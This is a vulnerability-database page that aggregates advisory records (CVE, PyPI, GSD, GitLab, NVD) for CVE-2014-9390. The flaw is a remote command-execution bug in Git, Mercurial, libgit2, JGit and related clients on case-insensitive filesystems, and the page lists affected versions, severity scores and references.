Action not permitted
Modal body text goes here.
Modal Title
Modal Body
cve-2014-9390
Vulnerability from cvelistv5
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-06T13:40:25.038Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://news.ycombinator.com/item?id=8769667", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://support.apple.com/kb/HT204147", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://securitytracker.com/id?1031404", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://libgit2.org/security/", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2014-12-18T00:00:00", descriptions: [ { lang: "en", value: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2020-09-09T17:07:52", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_MISC", ], url: "https://news.ycombinator.com/item?id=8769667", }, { tags: [ "x_refsource_MISC", ], url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { tags: [ "x_refsource_MISC", ], url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { tags: [ "x_refsource_MISC", ], url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { tags: [ "x_refsource_MISC", ], url: "http://support.apple.com/kb/HT204147", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { tags: [ "x_refsource_MISC", ], url: "http://securitytracker.com/id?1031404", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, { tags: [ "x_refsource_MISC", ], url: "https://libgit2.org/security/", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2014-9390", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "https://news.ycombinator.com/item?id=8769667", refsource: "MISC", url: "https://news.ycombinator.com/item?id=8769667", }, { name: "http://article.gmane.org/gmane.linux.kernel/1853266", refsource: "MISC", url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { name: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", refsource: "MISC", url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { name: "http://mercurial.selenic.com/wiki/WhatsNew", refsource: "MISC", url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { name: "http://support.apple.com/kb/HT204147", refsource: "MISC", url: "http://support.apple.com/kb/HT204147", }, { name: "https://github.com/blog/1938-git-client-vulnerability-announced", refsource: "MISC", url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { name: "http://securitytracker.com/id?1031404", refsource: "MISC", url: "http://securitytracker.com/id?1031404", }, { name: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", refsource: "MISC", url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, { name: "https://libgit2.org/security/", refsource: "MISC", url: "https://libgit2.org/security/", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2014-9390", datePublished: "2020-02-12T01:58:27", dateReserved: "2014-12-17T00:00:00", dateUpdated: "2024-08-06T13:40:25.038Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", "vulnerability-lookup:meta": { nvd: "{\"cve\":{\"id\":\"CVE-2014-9390\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2020-02-12T02:15:10.963\",\"lastModified\":\"2024-11-21T02:20:45.663\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.\"},{\"lang\":\"es\",\"value\":\"Git versiones anteriores a 1.8.5.6, versiones 1.9.x anteriores a 1.9.5, versiones 2.0.x anteriores a 2.0.5, versiones 2.1.x anteriores a 2.1.4 y versiones 2.2.x anteriores a 2.2.1 en Windows y OS X; Mercurial versiones anteriores a 3.2.3 en Windows y OS X; Apple Xcode versiones anteriores a 6.2 beta 3; mine todas las versiones antes del 08-12-2014; libgit2 todas las versiones hasta 0.21. 2; Egit todas las versiones anteriores al 08-12-2014; y JGit todas las versiones anteriores al 08-12-2014 permiten a los servidores Git remotos ejecutar comandos arbitrarios por medio de un árbol que contiene un archivo .git/config diseñado con (1) un punto de código Unicode ignorable, (2) una representación git~1/config, o (3) mayúsculas y minúsculas que no son manejadas apropiadamente en un sistema de archivos insensible a mayúsculas y minúsculas\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\"baseScore\":7.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.8.5.6\",\"matchCriteriaId\":\"BDA7AD30-7C02-418F-A62D-9C4C179088DB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"1.9.0\",\"versionEndExcluding\":\"1.9.5\",\"matchCriteriaId\":\"639D829A-5F78-49EB-924E-F6495EEB5153\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.0.0\",\"versionEndExcluding\":\"2.0.5\",\"matchCriteriaId\":\"9080C10B-548A-45AF-9B62-F80B92EEB4F4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.1.0\",\"versionEndExcluding\":\"2.1.4\",\"matchCriteriaId\":\"853D6A11-7FA6-4A92-87E2-6F7756E1C96A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.2.0\",\"versionEndExcluding\":\"2.2.1\",\"matchCriteriaId\":\"BDEC04F1-09CA-4957-90B6-5D87A68C2C06\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:o:apple:mac_os_x:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4781BF1E-8A4E-4AFF-9540-23D523EE30DD\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A2572D17-1DE6-457B-99CC-64AFD54487EA\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:mercurial:mercurial:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.2.3\",\"matchCriteriaId\":\"99B4890E-102C-442D-AB16-4D859A595656\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:o:apple:mac_os_x:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4781BF1E-8A4E-4AFF-9540-23D523EE30DD\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A2572D17-1DE6-457B-99CC-64AFD54487EA\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apple:xcode:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"6.1.1\",\"matchCriteriaId\":\"8DDD1870-453C-4B97-BE7B-9B3D6D4856D4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apple:xcode:6.2:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"9D061C24-F869-456D-8D26-8B6F63B6C834\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apple:xcode:6.2:beta_2:*:*:*:*:*:*\",\"matchCriteriaId\":\"0CD44704-4632-43DC-BC56-F872BCAF3E97\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:eclipse:egit:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"08-12-2014\",\"matchCriteriaId\":\"EB77E9A5-6A32-42BE-81C0-7D87A2076688\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:eclipse:jgit:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.4.2\",\"matchCriteriaId\":\"D5351751-FCFD-429E-8FF4-B8E9954D7248\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:eclipse:jgit:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.5.0\",\"versionEndExcluding\":\"3.5.3\",\"matchCriteriaId\":\"D1B88228-1044-4794-A954-A1CA8954D1BA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.21.3\",\"matchCriteriaId\":\"973A3E4A-6E15-4137-9933-4609A9CC805C\"}]}]}],\"references\":[{\"url\":\"http://article.gmane.org/gmane.linux.kernel/1853266\",\"source\":\"cve@mitre.org\",\"tags\":[\"Broken Link\"]},{\"url\":\"http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html\",\"source\":\"cve@mitre.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"http://mercurial.selenic.com/wiki/WhatsNew\",\"source\":\"cve@mitre.org\",\"tags\":[\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"http://securitytracker.com/id?1031404\",\"source\":\"cve@mitre.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://support.apple.com/kb/HT204147\",\"source\":\"cve@mitre.org\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://github.com/blog/1938-git-client-vulnerability-announced\",\"source\":\"cve@mitre.org\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915\",\"source\":\"cve@mitre.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://libgit2.org/security/\",\"source\":\"cve@mitre.org\",\"tags\":[\"Product\"]},{\"url\":\"https://news.ycombinator.com/item?id=8769667\",\"source\":\"cve@mitre.org\",\"tags\":[\"Issue Tracking\",\"Patch\",\"Third Party Advisory\"]},{\"url\":\"http://article.gmane.org/gmane.linux.kernel/1853266\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\"]},{\"url\":\"http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"http://mercurial.selenic.com/wiki/WhatsNew\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"http://securitytracker.com/id?1031404\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://support.apple.com/kb/HT204147\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://github.com/blog/1938-git-client-vulnerability-announced\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://libgit2.org/security/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\"]},{\"url\":\"https://news.ycombinator.com/item?id=8769667\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Issue Tracking\",\"Patch\",\"Third Party Advisory\"]}]}}", }, }
pysec-2020-217
Vulnerability from pysec
Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.
Name | purl |
---|---|
mercurial | pkg:pypi/mercurial |
{ affected: [ { package: { ecosystem: "PyPI", name: "mercurial", purl: "pkg:pypi/mercurial", }, ranges: [ { events: [ { introduced: "0", }, { fixed: "3.2.3", }, ], type: "ECOSYSTEM", }, ], versions: [ "0.8.1", "0.9", "0.9.1", "0.9.2", "0.9.3", "0.9.4", "0.9.5", "1.0", "1.0.1", "1.0.2", "1.1", "1.1.1", "1.1.2", "1.2", "1.2.1", "1.3", "1.3.1", "1.4", "1.4.1", "1.4.2", "1.4.3", "1.5", "1.5.1", "1.5.2", "1.5.3", "1.5.4", "1.6", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.7", "1.7.1", "1.7.2", "1.7.3", "1.7.5", "1.8", "1.8.1", "1.8.2", "1.8.3", "1.8.4", "1.9", "1.9.1", "1.9.2", "1.9.3", "2.0", "2.0.1", "2.0.2", "2.1", "2.1.1", "2.1.2", "2.2", "2.2.2", "2.3", "2.4.1", "2.5", "2.5.1", "2.5.2", "2.6", "2.6.1", "2.6.2", "2.6.3", "2.7.0", "2.7.1", "2.7.2", "2.8", "2.8.1", "2.8.2", "2.9", "2.9.1", "3.0", "3.0.1", "3.1", "3.1.1", "3.1.2", "3.2", "3.2.1", "3.2.2", ], }, ], aliases: [ "CVE-2014-9390", ], details: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", id: "PYSEC-2020-217", modified: "2021-07-25T23:34:39.934367Z", published: "2020-02-12T02:15:00Z", references: [ { type: "WEB", url: "https://news.ycombinator.com/item?id=8769667", }, { type: "ARTICLE", url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { type: "ARTICLE", url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { type: "WEB", url: "http://securitytracker.com/id?1031404", }, { type: "WEB", url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { type: "WEB", url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { type: "WEB", url: "http://support.apple.com/kb/HT204147", }, { type: "WEB", url: "https://libgit2.org/security/", }, { type: "FIX", url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, ], }
gsd-2014-9390
Vulnerability from gsd
{ GSD: { alias: "CVE-2014-9390", description: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", id: "GSD-2014-9390", references: [ "https://www.suse.com/security/cve/CVE-2014-9390.html", "https://ubuntu.com/security/CVE-2014-9390", "https://advisories.mageia.org/CVE-2014-9390.html", "https://packetstormsecurity.com/files/cve/CVE-2014-9390", ], }, gsd: { metadata: { exploitCode: "unknown", remediation: "unknown", reportConfidence: "confirmed", type: "vulnerability", }, osvSchema: { aliases: [ "CVE-2014-9390", ], details: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", id: "GSD-2014-9390", modified: "2023-12-13T01:22:48.400756Z", schema_version: "1.4.0", }, }, namespaces: { "cve.org": { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2014-9390", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "https://news.ycombinator.com/item?id=8769667", refsource: "MISC", url: "https://news.ycombinator.com/item?id=8769667", }, { name: "http://article.gmane.org/gmane.linux.kernel/1853266", refsource: "MISC", url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { name: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", refsource: "MISC", url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { name: "http://mercurial.selenic.com/wiki/WhatsNew", refsource: "MISC", url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { name: "http://support.apple.com/kb/HT204147", refsource: "MISC", url: "http://support.apple.com/kb/HT204147", }, { name: "https://github.com/blog/1938-git-client-vulnerability-announced", refsource: "MISC", url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { name: "http://securitytracker.com/id?1031404", refsource: "MISC", url: "http://securitytracker.com/id?1031404", }, { name: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", refsource: "MISC", url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, { name: "https://libgit2.org/security/", refsource: "MISC", url: "https://libgit2.org/security/", }, ], }, }, "gitlab.com": { advisories: [ { affected_range: "<0.21.3||>0.22a", affected_versions: "All versions before 0.21.3, all versions after 0.22a", cwe_ids: [ "CWE-1035", "CWE-20", "CWE-937", ], date: "2014-12-18", description: "An attacker can craft a malicious Git tree that will cause Git to overwrite its own `.git/config` file when cloning or checking out a repository, leading to arbitrary command execution in the client machine. Fixed versions of the gem depend on fixed versions of libgit2.", fixed_versions: [ "0.21.3", ], identifier: "CVE-2014-9390", identifiers: [ "CVE-2014-9390", ], not_impacted: "All versions starting from 0.21.3 up to 0.22a", package_slug: "gem/rugged", pubdate: "2014-12-18", solution: "Upgrade to version 0.21.3 or above.", title: "Arbitrary command execution", urls: [ "http://article.gmane.org/gmane.linux.kernel/1853266", "https://github.com/blog/1938-vulnerability-announced-update-your-git-clients", "https://github.com/libgit2/libgit2/releases/tag/v0.21.3", ], uuid: "692833fa-c93b-4ea3-a979-8e073f10683c", }, { affected_range: "(,3.5.3)", affected_versions: "All versions before 3.5.3", cvss_v2: "AV:N/AC:L/Au:N/C:P/I:P/A:P", cvss_v3: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", cwe_ids: [ "CWE-1035", "CWE-20", "CWE-78", "CWE-937", ], date: "2023-01-26", description: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", fixed_versions: [ "3.5.3", ], identifier: "CVE-2014-9390", identifiers: [ "GHSA-6vvc-c2m3-cjf3", "CVE-2014-9390", ], not_impacted: "All versions starting from 3.5.3", package_slug: "maven/org.eclipse.jgit/org.eclipse.jgit", pubdate: "2022-05-17", solution: "Upgrade to version 3.5.3 or above.", title: "Improper Input Validation", urls: [ "https://nvd.nist.gov/vuln/detail/CVE-2014-9390", "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", "https://github.com/blog/1938-git-client-vulnerability-announced", "https://libgit2.org/security/", "https://news.ycombinator.com/item?id=8769667", "http://article.gmane.org/gmane.linux.kernel/1853266", "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", "http://mercurial.selenic.com/wiki/WhatsNew", "http://securitytracker.com/id?1031404", "http://support.apple.com/kb/HT204147", "https://projects.eclipse.org/projects/technology.jgit/releases/3.5.3", "https://github.com/advisories/GHSA-6vvc-c2m3-cjf3", ], uuid: "06886231-ba84-4146-b014-8bd0780d1e32", }, ], }, "nvd.nist.gov": { configurations: { CVE_data_version: "4.0", nodes: [ { children: [ { children: [], cpe_match: [ { cpe23Uri: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", cpe_name: [], versionEndExcluding: "1.8.5.6", vulnerable: true, }, { cpe23Uri: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", cpe_name: [], versionEndExcluding: "1.9.5", versionStartIncluding: "1.9.0", vulnerable: true, }, { cpe23Uri: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", cpe_name: [], versionEndExcluding: "2.0.5", versionStartIncluding: "2.0.0", vulnerable: true, }, { cpe23Uri: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", cpe_name: [], versionEndExcluding: "2.1.4", versionStartIncluding: "2.1.0", vulnerable: true, }, { cpe23Uri: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", cpe_name: [], versionEndExcluding: "2.2.1", versionStartIncluding: "2.2.0", vulnerable: true, }, ], operator: "OR", }, { children: [], cpe_match: [ { cpe23Uri: "cpe:2.3:o:apple:mac_os_x:-:*:*:*:*:*:*:*", cpe_name: [], vulnerable: false, }, { cpe23Uri: "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", cpe_name: [], vulnerable: false, }, ], operator: "OR", }, ], cpe_match: [], operator: "AND", }, { children: [ { children: [], cpe_match: [ { cpe23Uri: "cpe:2.3:a:mercurial:mercurial:*:*:*:*:*:*:*:*", cpe_name: [], versionEndExcluding: "3.2.3", vulnerable: true, }, ], operator: "OR", }, { children: [], cpe_match: [ { cpe23Uri: "cpe:2.3:o:apple:mac_os_x:-:*:*:*:*:*:*:*", cpe_name: [], vulnerable: false, }, { cpe23Uri: "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", cpe_name: [], vulnerable: false, }, ], operator: "OR", }, ], cpe_match: [], operator: "AND", }, { children: [], cpe_match: [ { cpe23Uri: "cpe:2.3:a:apple:xcode:*:*:*:*:*:*:*:*", cpe_name: [], versionEndIncluding: "6.1.1", vulnerable: true, }, { cpe23Uri: "cpe:2.3:a:apple:xcode:6.2:-:*:*:*:*:*:*", cpe_name: [], vulnerable: true, }, { cpe23Uri: "cpe:2.3:a:apple:xcode:6.2:beta_2:*:*:*:*:*:*", cpe_name: [], vulnerable: true, }, ], operator: "OR", }, { children: [], cpe_match: [ { cpe23Uri: "cpe:2.3:a:eclipse:egit:*:*:*:*:*:*:*:*", cpe_name: [], versionEndExcluding: "08-12-2014", vulnerable: true, }, { cpe23Uri: "cpe:2.3:a:eclipse:jgit:*:*:*:*:*:*:*:*", cpe_name: [], versionEndExcluding: "3.4.2", vulnerable: true, }, { cpe23Uri: "cpe:2.3:a:eclipse:jgit:*:*:*:*:*:*:*:*", cpe_name: [], versionEndExcluding: "3.5.3", versionStartIncluding: "3.5.0", vulnerable: true, }, { cpe23Uri: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", cpe_name: [], versionEndExcluding: "0.21.3", vulnerable: true, }, ], operator: "OR", }, ], }, cve: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2014-9390", }, data_format: 